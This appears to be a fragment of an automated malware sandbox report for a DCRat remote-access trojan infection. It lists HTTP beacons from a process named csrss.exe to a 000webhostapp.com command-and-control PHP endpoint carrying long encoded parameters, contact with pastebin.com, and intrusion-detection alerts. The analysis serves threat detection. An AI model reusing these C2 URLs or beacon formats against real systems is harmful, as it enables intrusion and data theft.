UDO2EDZkdDNlNjYyIyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplEbahVYw40VRl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGaK5GT51UMRl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVGVFRKNETptWaiNTOtJmc1clVvFUaiNTOtJmc1clVp9maJxWMXl1TWZUVIp0QMlGNrlkNJlmYwFzRaJkTYFWa3lWSp9maJhkRFZVa3lWSwwWbRdWS610Z3dVW1lzVhpnTYpVb502YRJUeOdWTzQmdS1mYwRGbJZTSpNGbaxmYwRGbJNHMulUdsdkY5ZVbRZXVHNmdKhFZGpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplUN1cVW0pEWahkQTx0ZRdlWwp1VhpmVHNmeCNEZ2VzaJZTS5pVe50WSzlUeNBzZq5UdnRET0cGVNhHND1UMJl2Tp1kMiNnSDxUaVVkUp9maJVjSIRWdWNjYqp0QMlWVyMmeWd0Up9maJVXOXFmbW12YpdXaJVHbXllTCNlYoJ0QklnVuplc1cVW5p1aJZTSTVGMsJTWpdXaJFTUU1UdNRVT5RzQOlHNp5EeJpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJlmYwFzRahmSp9UaVdlYoVzajxmTYZVa3lWSEJkVMNlVwUlVKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiEmZhRmY5kzYyQWN3ITYwQ2MxMzN1EjYlVjZ0EWMiFGOiwiIyYTNlZWYwIzMhVTMiFTOygzN0QjNwMzM3QDNlZDO3cTYiZDZ3UDN0IiOiMDZykjN1AzMlRjM4MGZmFGZ2IDM1gDO0UGO0kDMxkTOiwiImhTMjBDNxcDMmNWY2UmN5gTYjJjN3MGO4EWY4EWYilzN3M2YkZmMkJiOiUWY3UWY4UzMkRjYjhTN3AzYlZzN1gjNxQGZ3QTZzImMis3W | unknown | text | 104 b | unknown |
2672 | csrss.exe | GET | 200 | 145.14.144.105:80 | http://hfriewofhewuiui342423.000webhostapp.com/L1nc0In.php?qbE=bG3RlDUvP&afe76f408e882d1360cb3c4f2a32c878=gYlJzMhNGOjBjY0MDZwMGMkR2NlZ2MyIzYwIWYmNTOyITOxMDN4ETO2YzM2ETMxcTMzYDNykTN&da1fbc1cd5a69ef44588d7cba69f3912=AMzQTOmJWZjZTO2EmZyEWZ2kjN5UTMwkDZmZTZxcjN4EWZjBjZzIGZ&32d366dd05d00cefa0aaf35a59181d5d=d1nIjdTZkhjMzMDOzIGOwIDM4IWMmRTYxQGO4ETZ4UzYhRGO4MTNlNjM2IiOiMDZykjN1AzMlRjM4MGZmFGZ2IDM1gDO0UGO0kDMxkTOiwiImhTMjBDNxcDMmNWY2UmN5gTYjJjN3MGO4EWY4EWYilzN3M2YkZmMkJiOiUWY3UWY4UzMkRjYjhTN3AzYlZzN1gjNxQGZ3QTZzImMis3W&ebe48df7063aaf50c194db1a0fb88c01=QX9JiI6ISYmFGZilTOjJDZ1cjMhBDZzEzM3UTMiVWNmRTYxIWY4ICLiM2NlRGOyMzM4MjY4AjMwgjYxYGNhFDZ4gTMlhTNjFGZ4gzM1U2MyYjI6IyMkJTO2UDMzUGNygzYkZWYkZjMwUDO4QTZ4QTOwETO5ICLiYGOxMGM0EzNwY2YhZTZ2kDOhNmM2czY4gTYhhTYhJWO3czYjRmZyQmI6ISZhdTZhhTNzQGNiNGO1cDMjVmN3UDO2EDZkdDNlNjYyIyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplEbahVYw40VRl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGaK5GT51UMRl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVGVFRKNETptWaiNTOtJmc1clVvFUaiNTOtJmc1clVp9maJxWMXl1TWZUVIp0QMlGNrlkNJlmYwFzRaJkTYFWa3lWSp9maJhkRFZVa3lWSwwWbRdWS610Z3dVW1lzVhpnTYpVb502YRJUeOdWTzQmdS1mYwRGbJZTSpNGbaxmYwRGbJNHMulUdsdkY5ZVbRZXVHNmdKhFZGpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplUN1cVW0pEWahkQTx0ZRdlWwp1VhpmVHNmeCNEZ2VzaJZTS5pVe50WSzlUeNBzZq5UdnRET0cGVNhHND1UMJl2Tp1kMiNnSDxUaVVkUp9maJVjSIRWdWNjYqp0QMlWVyMmeWd0Up9maJVXOXFmbW12YpdXaJVHbXllTCNlYoJ0QklnVuplc1cVW5p1aJZTSTVGMsJTWpdXaJFTUU1UdNRVT5RzQOlHNp5EeJpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJlmYwFzRahmSp9UaVdlYoVzajxmTYZVa3lWSEJkVMNlVwUlVKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiEmZhRmY5kzYyQWN3ITYwQ2MxMzN1EjYlVjZ0EWMiFGOiwiIyYTNlZWYwIzMhVTMiFTOygzN0QjNwMzM3QDNlZDO3cTYiZDZ3UDN0IiOiMDZykjN1AzMlRjM4MGZmFGZ2IDM1gDO0UGO0kDMxkTOiwiImhTMjBDNxcDMmNWY2UmN5gTYjJjN3MGO4EWY4EWYilzN3M2YkZmMkJiOiUWY3UWY4UzMkRjYjhTN3AzYlZzN1gjNxQGZ3QTZzImMis3W | unknown | text | 104 b | unknown |
2672 | csrss.exe | GET | 200 | 145.14.144.105:80 | http://hfriewofhewuiui342423.000webhostapp.com/L1nc0In.php?qbE=bG3RlDUvP&afe76f408e882d1360cb3c4f2a32c878=gYlJzMhNGOjBjY0MDZwMGMkR2NlZ2MyIzYwIWYmNTOyITOxMDN4ETO2YzM2ETMxcTMzYDNykTN&da1fbc1cd5a69ef44588d7cba69f3912=AMzQTOmJWZjZTO2EmZyEWZ2kjN5UTMwkDZmZTZxcjN4EWZjBjZzIGZ&32d366dd05d00cefa0aaf35a59181d5d=d1nIjdTZkhjMzMDOzIGOwIDM4IWMmRTYxQGO4ETZ4UzYhRGO4MTNlNjM2IiOiMDZykjN1AzMlRjM4MGZmFGZ2IDM1gDO0UGO0kDMxkTOiwiImhTMjBDNxcDMmNWY2UmN5gTYjJjN3MGO4EWY4EWYilzN3M2YkZmMkJiOiUWY3UWY4UzMkRjYjhTN3AzYlZzN1gjNxQGZ3QTZzImMis3W&ebe48df7063aaf50c194db1a0fb88c01=QX9JiI6ISYmFGZilTOjJDZ1cjMhBDZzEzM3UTMiVWNmRTYxIWY4ICLiM2NlRGOyMzM4MjY4AjMwgjYxYGNhFDZ4gTMlhTNjFGZ4gzM1U2MyYjI6IyMkJTO2UDMzUGNygzYkZWYkZjMwUDO4QTZ4QTOwETO5ICLiYGOxMGM0EzNwY2YhZTZ2kDOhNmM2czY4gTYhhTYhJWO3czYjRmZyQmI6ISZhdTZhhTNzQGNiNGO1cDMjVmN3UDO2EDZkdDNlNjYyIyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplEbahVYw40VRl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGaK5GT51UMRl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVGVFRKNETptWaiNTOtJmc1clVvFUaiNTOtJmc1clVp9maJxWMXl1TWZUVIp0QMlGNrlkNJlmYwFzRaJkTYFWa3lWSp9maJhkRFZVa3lWSwwWbRdWS610Z3dVW1lzVhpnTYpVb502YRJUeOdWTzQmdS1mYwRGbJZTSpNGbaxmYwRGbJNHMulUdsdkY5ZVbRZXVHNmdKhFZGpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplUN1cVW0pEWahkQTx0ZRdlWwp1VhpmVHNmeCNEZ2VzaJZTS5pVe50WSzlUeNBzZq5UdnRET0cGVNhHND1UMJl2Tp1kMiNnSDxUaVVkUp9maJVjSIRWdWNjYqp0QMlWVyMmeWd0Up9maJVXOXFmbW12YpdXaJVHbXllTCNlYoJ0QklnVuplc1cVW5p1aJZTSTVGMsJTWpdXaJFTUU1UdNRVT5RzQOlHNp5EeJpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJlmYwFzRahmSp9UaVdlYoVzajxmTYZVa3lWSEJkVMNlVwUlVKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiEmZhRmY5kzYyQWN3ITYwQ2MxMzN1EjYlVjZ0EWMiFGOiwiIyYTNlZWYwIzMhVTMiFTOygzN0QjNwMzM3QDNlZDO3cTYiZDZ3UDN0IiOiMDZykjN1AzMlRjM4MGZmFGZ2IDM1gDO0UGO0kDMxkTOiwiImhTMjBDNxcDMmNWY2UmN5gTYjJjN3MGO4EWY4EWYilzN3M2YkZmMkJiOiUWY3UWY4UzMkRjYjhTN3AzYlZzN1gjNxQGZ3QTZzImMis3W | unknown | text | 104 b | unknown |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
1080 | svchost.exe | 224.0.0.252:5355 | — | — | — | unknown |
2672 | csrss.exe | 172.67.34.170:443 | pastebin.com | CLOUDFLARENET | US | unknown |
2672 | csrss.exe | 145.14.144.105:80 | hfriewofhewuiui342423.000webhostapp.com | Hostinger International Limited | NL | shared |
Domain | IP | Reputation |
|---|---|---|
pastebin.com |
| shared |
hfriewofhewuiui342423.000webhostapp.com |
| unknown |
PID | Process | Class | Message |
|---|---|---|---|
1080 | svchost.exe | Not Suspicious Traffic | ET INFO Observed Free Hosting Domain (*.000webhostapp .com in DNS Lookup) |
1080 | svchost.exe | Not Suspicious Traffic | ET INFO Observed Free Hosting Domain (*.000webhostapp .com in DNS Lookup) |
2672 | csrss.exe | A Network Trojan was detected | ET MALWARE DCRAT Activity (GET) |
2672 | csrss.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |